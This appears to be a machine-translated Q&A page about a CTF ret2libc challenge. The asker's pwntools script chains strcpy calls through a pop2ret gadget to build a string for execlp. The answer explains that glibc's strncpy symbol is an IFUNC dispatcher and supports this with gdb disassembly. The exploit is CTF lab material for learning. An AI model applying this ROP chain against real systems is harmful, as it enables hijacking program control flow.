ret2libc strcpy无效

时间:2016-09-19 17:36:12

标签: python assembly exploit

我正在尝试解决CTF挑战,我需要使用ret2libc。问题是当我尝试使用strcpy将一些文本放在缓冲区中供以后使用时,它似乎不起作用。 挑战框仍然容易受到限制 - 无限制"所以我们可以修复libc地址。这是我目前的python代码:

from pwn import *

def r2lc_print(write_buff,read_buff):
  strcpy_addr=0x55607a40
  pop2ret=0x55643876
  return p32(strcpy_addr)+p32(pop2ret)+p32(write_buff)+p32(read_buff)

buffer_size=172
execlp_addr=0x55643970

c00_str_addr=0x55575d37
a00_str_addr=0x55575d5e
t00_str_addr=0x55575440
write_buff=0x55576858

print cyclic(buffer_size)+r2lc_print(write_buff,c00_str_addr)+r2lc_print(write_buff,a00_str_addr)+r2lc_print(write_buff,t00_str_addr)+"A"*4

我通过发出" p strcpy"得到了strcpy地址。在gdb里面。

问题是strcpy似乎不完整,因为指令或调用都没有进行任何数据移动:

   0x55608320 <strncpy>:        push   ebx
   0x55608321 <strncpy+1>:      call   0x556b5c63
   0x55608326 <strncpy+6>:      add    ebx,0x127cce
   0x5560832c <strncpy+12>:     cmp    DWORD PTR [ebx+0x368c],0x0
   0x55608333 <strncpy+19>:     jne    0x5560833a <strncpy+26>
   0x55608335 <strncpy+21>:     call   0x555a48b0
   0x5560833a <strncpy+26>:     lea    eax,[ebx-0x120e54]
   0x55608340 <strncpy+32>:     test   DWORD PTR [ebx+0x36a0],0x4000000
   0x5560834a <strncpy+42>:     je     0x55608370 <strncpy+80>
   0x5560834c <strncpy+44>:     lea    eax,[ebx-0x117f14]
   0x55608352 <strncpy+50>:     test   DWORD PTR [ebx+0x36bc],0x10
   0x5560835c <strncpy+60>:     jne    0x55608370 <strncpy+80>
   0x5560835e <strncpy+62>:     test   DWORD PTR [ebx+0x369c],0x200
   0x55608368 <strncpy+72>:     je     0x55608370 <strncpy+80>
   0x5560836a <strncpy+74>:     lea    eax,[ebx-0x11f554]
   0x55608370 <strncpy+80>:     pop    ebx
   0x55608371 <strncpy+81>:     ret

1 个答案:

答案 0 :(得分:0)

认为您在glibc的strncpy符号中看到的代码会在延迟动态链接期间调度运行时CPU。它看起来像sysdeps/i386/i686/multiarch/strcpy.S中的asm。此文件已多次构建(通过#include到其他文件中),STRCPY宏定义为strcpy,strncpy和其他文件。

我认为它只返回应该使用的str [n] cpy版本的函数指针,并且调用它的动态链接器代码将该指针存储到PLT然后调用它。

如果你编译一个两次调用strncpy的微小C程序,你可以单步执行第二次调用,并且已经完成了延迟动态链接。

#include <string.h>
int main(int argc, char**argv) {
        strncpy(argv[0], argv[1], 5);
        strncpy(argv[1], argv[2], 5);
}

使用gcc -m32 -Og foo.c -g进行编译。

根据gdb,在Ubuntu 15.10的libc-2.21.0.so中,PLT跳转会在任何符号之外传递一个函数。 (我将set disassembly-flavor intellayout reg放在我的~/.gdbinit中以获取TUI注册和asm“windows”。)

  >|0xf7e68fa0      push   ebx                           |
   |0xf7e68fa1      mov    edx,DWORD PTR [esp+0x8]       |
   |0xf7e68fa5      mov    ecx,DWORD PTR [esp+0xc]       |
   |0xf7e68fa9      mov    ebx,DWORD PTR [esp+0x10]      |
   |0xf7e68fad      cmp    ebx,0x8                       |
   |0xf7e68fb0      jbe    0xf7e6ba40                    |
   |0xf7e68fb6      cmp    BYTE PTR [ecx],0x0            |
   |0xf7e68fb9      je     0xf7e6aef0                    |
   |0xf7e68fbf      cmp    BYTE PTR [ecx+0x1],0x0        |
   |0xf7e68fc3      je     0xf7e6af10                    |

...最终是一个movaps / pcmpeqb / pmovmskb循环。这个函数是真正的strncpy实现,不会发送到其他任何东西。

相关问题
最新问题